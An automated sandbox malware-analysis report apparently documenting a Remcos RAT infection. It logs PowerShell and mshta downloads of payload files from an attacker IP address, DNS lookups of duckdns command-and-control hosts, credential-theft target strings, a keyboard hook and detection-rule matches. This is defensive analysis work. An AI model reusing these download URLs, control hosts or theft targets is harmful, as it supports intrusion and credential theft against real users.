              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Subumbilical.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714605232991&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu
              Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE
              Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Subumbilical.dwpXR
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.108
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3223807080.0000004D6CC7B000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2743509012.0000021BB3CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
              Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/i
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0
              Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
              Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
              Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprqDS
              Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2643041516.00000000029E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,22_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_3748.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2212.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 6098
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6098
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 6098Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6098Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0419DC2F Sleep,LdrInitializeThunk,NtProtectVirtualMemory,10_2_0419DC2F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D9CC601_2_02D9CC60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D9A16C1_2_02D9A16C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D90FF31_2_02D90FF3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D910441_2_02D91044
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D916AD1_2_02D916AD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D9166D1_2_02D9166D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C9B5C110_2_22C9B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22CA719410_2_22CA7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B04016_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043610D16_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044731016_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044A49016_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040755A16_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043C56016_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B61016_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044D6C016_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004476F016_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B87016_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044081D16_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041495716_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004079EE16_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407AEB16_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044AA8016_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00412AA916_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B7416_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B0316_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044BBD816_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404BE516_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404C7616_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00415CFE16_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416D7216_2_00416D72
